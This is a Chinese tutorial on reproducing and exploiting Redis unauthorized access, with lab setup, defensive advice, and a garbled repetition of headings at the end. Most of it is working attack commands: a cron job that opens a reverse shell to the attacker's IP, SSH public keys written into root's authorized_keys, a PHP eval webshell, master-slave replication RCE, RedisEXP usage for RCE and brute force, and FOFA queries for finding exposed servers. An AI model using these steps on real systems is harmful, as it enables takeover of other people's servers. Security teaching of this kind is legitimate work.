Redis未授权漏洞复现与利用全面指南<\/h1>

1. Redis简介与基本概念<\/h2>

Redis是一个开源的、基于内存的键值对存储数据库，具有以下特性：<\/p>

使用ANSI C编写，支持多种数据结构<\/li>
支持网络访问，可基于内存也可持久化<\/li>
高性能，支持分布式扩展<\/li>

被GitHub、Twitter、微博、阿里、美团、百度等大厂广泛使用<\/li> <\/ul>

Redis常见应用场景<\/h3>

缓存系统（高频读、低频写的"热点"数据）<\/li>
计数器<\/li>
消息队列系统<\/li>
排行榜<\/li>
社交网络<\/li>

实时系统<\/li> <\/ul>

2. Redis基本命令与配置<\/h2>

常用Redis命令<\/h3>

redis-cli -h ip -p 6379 -a passwd  # 外部连接Redis
info  # 查看Redis信息
set xz "Hacker"  # 设置键值
get xz  # 获取键值
INCR score  # 值增加1
keys *  # 列出所有键
config set protected-mode no  # 关闭安全模式
config set dir \/root\/redis  # 设置保存目录
config set dbfilename redis.rdb  # 设置保存文件名
config get dir  # 查看保存目录
config get dbfilename  # 查看保存文件名
save  # 备份操作
flushall  # 删除所有数据
del key  # 删除指定键
slaveof ip port  # 设置主从关系
mset k1 v1 k2 v2 k3 v3  # 批量设置键值对
mget k1 k2 k3  # 批量获取键值对
<\/code><\/pre>
Redis配置文件关键参数<\/h3>

port 6379<\/code>：监听端口<\/li>
bind 192.168.47.173<\/code>：绑定IP（白名单）<\/li>
save <秒数> <变化数><\/code>：自动备份条件<\/li>
requirepass<\/code>：连接密码<\/li>
dir .\/<\/code>：工作目录<\/li>
dbfilename dump.rdb<\/code>：备份文件名<\/li>
protected-mode<\/code>：安全模式（3.2+版本新增）<\/li>
<\/ul>
3. Redis未授权访问漏洞概述<\/h2>
漏洞原理<\/h3>
Redis默认绑定在0.0.0.0:6379，如果没有设置密码认证且未配置防火墙规则，会导致任意用户可未授权访问Redis并读取数据。<\/p>
漏洞危害<\/h3>
攻击者可利用Redis的config命令进行写文件操作，包括：<\/p>

写入SSH公钥实现SSH登录<\/li>
写入计划任务实现反弹shell<\/li>
写入Webshell获取Web控制权<\/li>
利用主从复制机制执行任意命令<\/li>
<\/ol>
4. 漏洞复现环境搭建<\/h2>
靶机环境（CentOS 7）<\/h3>
wget https:\/\/download.redis.io\/releases\/redis-4.0.10.tar.gz
<\/span><\/span>tar -zxvf redis-4.0.10.tar.gz
<\/span><\/span>cd redis-4.0.10\/src
<\/span><\/span>make &&<\/span> make install
<\/span><\/span>
<\/span><\/span># 解决编译错误<\/span>
<\/span><\/span>yum install gcc-c++
<\/span><\/span>make distclean
<\/span><\/span>make &&<\/span> make install
<\/span><\/span>
<\/span><\/span># 修改配置文件<\/span>
<\/span><\/span>vim ..\/redis.conf
<\/span><\/span># 修改以下参数：<\/span>
<\/span><\/span># daemonize yes<\/span>
<\/span><\/span># #bind 127.0.0.1<\/span>
<\/span><\/span># protected-mode no<\/span>
<\/span><\/span>
<\/span><\/span># 启动Redis<\/span>
<\/span><\/span>..\/redis-server ..\/redis.conf
<\/span><\/span>
<\/span><\/span># 关闭防火墙<\/span>
<\/span><\/span>iptables -F
<\/span><\/span>setenforce 0<\/span>
<\/span><\/span>systemctl stop firewalld.service
<\/span><\/span><\/code><\/pre>攻击机环境（Kali Linux）<\/h3>
wget https:\/\/download.redis.io\/releases\/redis-7.0.0.tar.gz
<\/span><\/span>tar -zxf redis-7.0.0.tar.gz
<\/span><\/span>cd redis-7.0.0
<\/span><\/span>make
<\/span><\/span>cp src\/redis-cli \/usr\/bin
<\/span><\/span>
<\/span><\/span># 测试连接<\/span>
<\/span><\/span>redis-cli -h 靶机IP -p 6379<\/span> --raw
<\/span><\/span><\/code><\/pre>5. Redis未授权漏洞利用方法<\/h2>
5.1 利用计划任务反弹shell<\/h3>
# 攻击机监听
nc -lvvp 2333

# Redis操作
set xxx "\n\n*\/1 * * * * bash -i >& \/dev\/tcp\/攻击机IP\/2333 0>&1\n\n"
config set dir \/var\/spool\/cron\/
config set dbfilename root
save
<\/code><\/pre>
5.2 写入SSH公钥实现SSH登录<\/h3>
# 攻击机生成SSH密钥<\/span>
<\/span><\/span>ssh-keygen -t rsa
<\/span><\/span>(<\/span>echo -e "\n\n"<\/span>; cat \/root\/.ssh\/id_rsa.pub; echo -e "\n\n"<\/span>)<\/span> > key.txt
<\/span><\/span>
<\/span><\/span># 将公钥写入Redis<\/span>
<\/span><\/span>cat key.txt | redis-cli -h 靶机IP -x set crack
<\/span><\/span>
<\/span><\/span># Redis操作<\/span>
<\/span><\/span>config set dir \/root\/.ssh
<\/span><\/span>config set dbfilename authorized_keys
<\/span><\/span>save
<\/span><\/span>
<\/span><\/span># 如果靶机没有.ssh目录，先创建<\/span>
<\/span><\/span>mkdir \/root\/.ssh
<\/span><\/span>
<\/span><\/span># SSH连接<\/span>
<\/span><\/span>ssh -i \/root\/.ssh\/id_rsa root@靶机IP
<\/span><\/span><\/code><\/pre>5.3 写入Webshell<\/h3>
config set dir \/var\/www\/html
config set dbfilename shell.php
set webshell "\n\n<?php @eval(\$_POST['cmd'])?>\n\n"
save
<\/code><\/pre>
5.4 主从复制GetShell（Redis 4.x\/5.x <=5.0.5）<\/h3>
使用工具：Awsome-Redis-Rogue-Server<\/p>
python3 redis-rogue-server.py --rhost 靶机IP --lhost 攻击机IP
<\/span><\/span><\/code><\/pre>6. 自动化测试工具推荐<\/h2>
RedisEXP工具使用<\/h3>
# 基本连接<\/span>
<\/span><\/span>RedisExp.exe -r 目标IP -p 6379<\/span> -w 密码
<\/span><\/span>
<\/span><\/span># 执行Redis命令<\/span>
<\/span><\/span>RedisExp.exe -m cli -r 目标IP -p 6379<\/span> -w 密码 -c info
<\/span><\/span>
<\/span><\/span># 加载dll\/so执行命令<\/span>
<\/span><\/span>RedisExp.exe -m load -r 目标IP -p 6379<\/span> -rf exp.dll -n system -t system.exec
<\/span><\/span>
<\/span><\/span># 主从复制命令执行<\/span>
<\/span><\/span>RedisExp.exe -m rce -r 目标IP -p 6379<\/span> -L 本地IP -P 本地Port -c whoami
<\/span><\/span>
<\/span><\/span># 主从复制上传文件<\/span>
<\/span><\/span>RedisExp.exe -m upload -r 目标IP -p 6379<\/span> -L 本地IP -P 本地Port -rp 目标路径 -rf 目标文件名 -lf 本地文件
<\/span><\/span>
<\/span><\/span># 写计划任务<\/span>
<\/span><\/span>RedisExp.exe -m cron -r 目标IP -p 6379<\/span> -L VpsIP -P VpsPort
<\/span><\/span>
<\/span><\/span># 写SSH公钥<\/span>
<\/span><\/span>RedisExp.exe -m ssh -r 目标IP -p 6379<\/span> -u root -s 公钥内容
<\/span><\/span>
<\/span><\/span># 写Webshell<\/span>
<\/span><\/span>RedisExp.exe -m shell -r 目标IP -p 6379<\/span> -rp 目标路径 -rf 目标文件名 -s Webshell内容
<\/span><\/span>
<\/span><\/span># CVE-2022-0543利用<\/span>
<\/span><\/span>RedisExp.exe -m cve -r 目标IP -p 6379<\/span> -w 密码 -c 执行命令
<\/span><\/span>
<\/span><\/span># 爆破Redis密码<\/span>
<\/span><\/span>RedisExp.exe -m brute -r 目标IP -p 6378<\/span> -f pass.txt
<\/span><\/span><\/code><\/pre>7. 漏洞防护建议<\/h2>

升级Redis版本<\/strong>：升级到4.x\/5.0.5或更高版本<\/li>
修改默认端口<\/strong>：将6379改为其他端口<\/li>
设置强密码认证<\/strong>：配置requirepass参数<\/li>
网络隔离<\/strong>：

绑定内网IP（bind参数）<\/li>
配置防火墙规则限制访问<\/li>
<\/ul>
<\/li>
最小权限原则<\/strong>：

以非root用户运行Redis<\/li>
限制Redis配置目录的写入权限<\/li>
<\/ul>
<\/li>
启用保护模式<\/strong>：protected-mode yes（3.2+版本）<\/li>
重命名危险命令<\/strong>：如rename-command CONFIG HTCMD<\/li>
<\/ol>
8. 资产发现与漏洞验证<\/h2>
使用FOFA搜索Redis资产<\/h3>
protocol="redis" && port="6379" && app="redis"
<\/code><\/pre>
使用afrog进行漏洞验证<\/h3>
afrog -s redis -T redis.txt -S high -o redis.html
<\/span><\/span><\/code><\/pre>9. 总结<\/h2>
Redis未授权访问漏洞危害严重，攻击者可利用多种方式获取服务器权限。防护措施应从网络隔离、访问控制、权限管理和版本更新等多方面入手。安全研究人员在测试时应遵守法律法规，仅在授权范围内进行测试。<\/p>

Redis未授权漏洞复现与利用全面指南<\/h1>

2. Redis基本命令与配置<\/h2>

3. Redis未授权访问漏洞概述<\/h2>

漏洞原理<\/h3> Redis默认绑定在0.0.0.0:6379，如果没有设置密码认证且未配置防火墙规则，会导致任意用户可未授权访问Redis并读取数据。<\/p>

4. 漏洞复现环境搭建<\/h2>

5. Redis未授权漏洞利用方法<\/h2>

6. 自动化测试工具推荐<\/h2>

8. 资产发现与漏洞验证<\/h2>

漏洞原理<\/h3>
Redis默认绑定在0.0.0.0:6379，如果没有设置密码认证且未配置防火墙规则，会导致任意用户可未授权访问Redis并读取数据。<\/p>